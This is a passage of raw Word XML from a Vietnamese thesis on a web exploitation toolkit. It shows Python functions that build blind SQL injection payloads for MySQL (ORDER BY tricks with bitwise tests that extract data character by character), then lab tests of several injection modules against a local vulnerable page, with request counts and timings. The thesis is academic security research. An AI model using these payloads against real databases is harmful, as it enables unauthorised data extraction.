            <w:tcW w:w="9450" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00161298" w:rsidRPr="00161298" w:rsidRDefault="00161298" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00161298">
              <w:t>def getMySQLLength(self, query):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00161298" w:rsidRPr="00161298" w:rsidRDefault="00161298" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t xml:space="preserve">payload </w:t>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t>= "order by (select if((@hbn:=@hbn%2b1)&lt;10,if(@hbn=1,1,if((select length(({0}))) %26 pow(2,@hbn-2) &gt; 0,@hbn,-@hbn)),1000) from  (select @hbn:=0) as t)".format(query)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00161298" w:rsidRPr="00161298" w:rsidRDefault="00161298" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t>self.resultLength = (self.getQueryResult(payload))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00161298" w:rsidRDefault="00161298" w:rsidP="00161298">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="009B48A0">
        <w:t>getMySQLQueryResult</w:t>
      </w:r>
      <w:r>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9180"/>
      </w:tblGrid>
      <w:tr w:rsidR="00161298" w:rsidRPr="00161298" w:rsidTr="00161298">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9450" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00161298" w:rsidRPr="00161298" w:rsidRDefault="00161298" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00161298">
              <w:t>def getMySQLQueryResult(self, query):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00161298" w:rsidRPr="00161298" w:rsidRDefault="00161298" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t>if(self.resultLength != None):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00161298" w:rsidRPr="00161298" w:rsidRDefault="00161298" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t>for i in range(0, self.resultLength):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00161298" w:rsidRPr="00161298" w:rsidRDefault="00161298" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t>payload =</w:t>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t>"order by (select if((@hbn:=@hbn%2b1)&lt;10,if(@hbn=1,1,if((select ascii(substring(({0}),{1},1))) %26 pow(2,@hbn-2) &gt; 0,@hbn,-@hbn)),1000) from  (select @hbn:=0) as t)".format(query, i+1)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00161298" w:rsidRPr="00161298" w:rsidRDefault="00161298" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t>tmp = (self.getQueryResult(payload))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00161298" w:rsidRPr="00161298" w:rsidRDefault="00161298" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t>self.logger.info("Found character number {0} is: {1}".format(i+1, chr(tmp)))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00161298" w:rsidRPr="00161298" w:rsidRDefault="00161298" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t xml:space="preserve">self.result </w:t>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t>+=</w:t>
            </w:r>
            <w:r w:rsidRPr="00161298">
              <w:tab/>
              <w:t>chr(tmp)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00161298" w:rsidRDefault="00161298" w:rsidP="00161298">
      <w:r>
        <w:t xml:space="preserve">Hàm runner thực hiện chạy câu lệnh SQL, gọi đến hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="00731E3A">
        <w:t>runMySQLQuery</w:t>
      </w:r>
      <w:r>
        <w:t>(), từ đây sẽ lần lượt thực hiện lấy độ dài kết quả, rồi lấy từng ký tự.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00161298" w:rsidRDefault="00161298" w:rsidP="00161298">
      <w:r>
        <w:t>Hàm __init__ thực hiện khởi tạo các thành phần liên quan, cần sử dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10140" w:rsidRPr="00CC2642" w:rsidRDefault="00161298" w:rsidP="003A3F0E">
      <w:r>
        <w:t xml:space="preserve">Chi tiết về toàn bộ mã tấn công của phương pháp tìm kiếm nhị phân tham khảo </w:t>
      </w:r>
      <w:r w:rsidR="00D655B3">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>mục 4 P</w:t>
      </w:r>
      <w:r>
        <w:t>hụ lục của luận văn.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRPr="005D3C52" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="150" w:name="_Toc459374360"/>
      <w:bookmarkStart w:id="151" w:name="_Toc459374361"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Thử nghiệm và đ</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ánh giá kết quả</w:t>
      </w:r>
      <w:bookmarkEnd w:id="150"/>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRPr="005D3C52" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Để đánh giá hiệu quả của từng phương pháp cần đo được số lượng yêu cầu gửi đi, và thời gian để thực hiện xong mã tấn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">công. Để lấy các thông tin này có thể sử dụng các công cụ để đo, chặn bắt gói tin như: </w:t>
      </w:r>
      <w:r w:rsidRPr="007F4307">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, tcpdump.. Tuy nhiên, bộ framework </w:t>
      </w:r>
      <w:r w:rsidRPr="007F4307">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>WETK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã hỗ trợ tính năng này. Để sử dụng chỉ cần bật tham số debug (-d) của công cụ, các thông tin chi tiết sẽ được hiển thị.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Lần lượt thử nghiệm chạy các module, tương ứng với các phương pháp tấn công. Trước tiên cần gọi đến module đó, và xem các tham số </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ần để nạp vào khi chạy module bằng cách sử dụng tham số -so (show module options). Các tham số mà Required là YES thì bắt buộc phải có.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BDAD70E" wp14:editId="25791306">
            <wp:extent cx="5502656" cy="2429049"/>
            <wp:effectExtent l="19050" t="0" r="27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b="-17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5502656" cy="2429049"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRPr="00CB53C6" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="152" w:name="_Toc458436445"/>
      <w:r w:rsidRPr="00CB53C6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB53C6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00CB53C6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00CB53C6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>33</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB53C6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00CB53C6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="0030524E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Hiển thị các option của module sqlinjection.b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>lind</w:t>
      </w:r>
      <w:bookmarkEnd w:id="152"/>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30DB85FA" wp14:editId="70AF9585">
            <wp:extent cx="5565288" cy="242133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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5568891" cy="2422899"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="153" w:name="_Toc458436446"/>
      <w:r w:rsidRPr="0030524E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidRPr="0030524E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0030524E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0030524E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>34</w:t>
      </w:r>
      <w:r w:rsidRPr="0030524E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0030524E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>: Hiển thị các option của module sqlinjection.b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>inary_search</w:t>
      </w:r>
      <w:bookmarkEnd w:id="153"/>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B07F705" wp14:editId="1B9C3D48">
            <wp:extent cx="5625081" cy="253191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5632343" cy="2535183"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRPr="003A3F0E" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="154" w:name="_Toc458436447"/>
      <w:r w:rsidRPr="003A3F0E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidRPr="003A3F0E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="003A3F0E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="003A3F0E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>35</w:t>
      </w:r>
      <w:r w:rsidRPr="003A3F0E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="003A3F0E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="0030524E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Hiển thị các option của module sqlinjection.b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>it_shift</w:t>
      </w:r>
      <w:bookmarkEnd w:id="154"/>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:r w:rsidRPr="00CD230E">
        <w:t>WETK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cung cấp sẵn cả hai giao thức là GET và POST, cũng như hỗ trợ việc truyền vào inject point. Inject point là điểm vào mắc lỗi, nơi mà sẽ truyền vào các mã tấn công. Inject point có thể ở trong URL, post data, cookie… . để truyền inject point thì sử dụng dấu *. Mặc định một lần thì chỉ có 1 điểm inject point. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:r>
        <w:t xml:space="preserve">Trong môi trường thực nghiệm, vị trí lỗi là tham số point trên địa chỉ url. Do đó ta sẽ nhập url là </w:t>
      </w:r>
      <w:hyperlink r:id="rId60" w:history="1">
        <w:r w:rsidRPr="00A56025">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.1.59/vul.php?point=1%20*</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. Các mã  tấn công sẽ được truyền vào vị trí của dấu *.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:r>
        <w:t>Một tham số nữa cũng bắt buộc là PATTERN. Tham số này cung cấp mẫu để xác định đúng/sai. Trong phần 4.1 nếu đúng sẽ trả về danh s</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ách thí sinh. Do đó sẽ lấy một đoạn mẫu trong danh sách để </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD230E">
        <w:t>WETK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nhận diện đúng sai.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:r>
        <w:t xml:space="preserve">Thông thường, để thực thi một query cần phải có bước lấy độ dài của chuỗi trả về. Tuy nhiên, để tránh ảnh hưởng kết quả thực nghiệm lấy 1 ký tự (chỉ tập trung vào các yêu cầu cần thiết để lấy nội dung ký tự trong chuỗi) sẽ bỏ qua bước này. Cần tiến hành cấu hình sẵn câu lệnh sẽ thực hiện, và độ dài của kết quả trả về. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:r>
        <w:t>Trong bài kiểm tra đầu tiên, thực hiện lấy 01 ký tự. Các module sẽ chạy để lấy kết quả của câu truy vấn: select “Z”. Câu truy vấn này sẽ trả về kết quả là 1 ký tự (độ dài bằng 1). Trước tiên là với module cơ bản sqlinjection.blind:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53E7AB0D" wp14:editId="7999FEE4">
            <wp:extent cx="5972175" cy="673266"/>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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5972175" cy="673266"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Số lần gửi yêu cầu là 62 và thời gian thực hiện xong là 144 (</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0F2A">
        <w:t>millisecond</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Tiếp tục thử nghiệm với module sqlinjection.binary_search:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23D4639F" wp14:editId="25FE88BB">
            <wp:extent cx="5972175" cy="645872"/>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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5972175" cy="645872"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Số lần gửi yêu cầu là 7 và thời gian thực hiện xong là 25 (</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0F2A">
        <w:t>millisecond</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Thử nghiệm với module sqlinjection.bit_shitf:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30D029BA" wp14:editId="3CDD9C76">
            <wp:extent cx="5972175" cy="64443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5972175" cy="644430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Số lần gửi yêu cầu là 7 và thời gian thực hiện xong là 38 (</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0F2A">
        <w:t>millisecond</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Thử nghiệm với module sqlinjection.</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>orderby:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
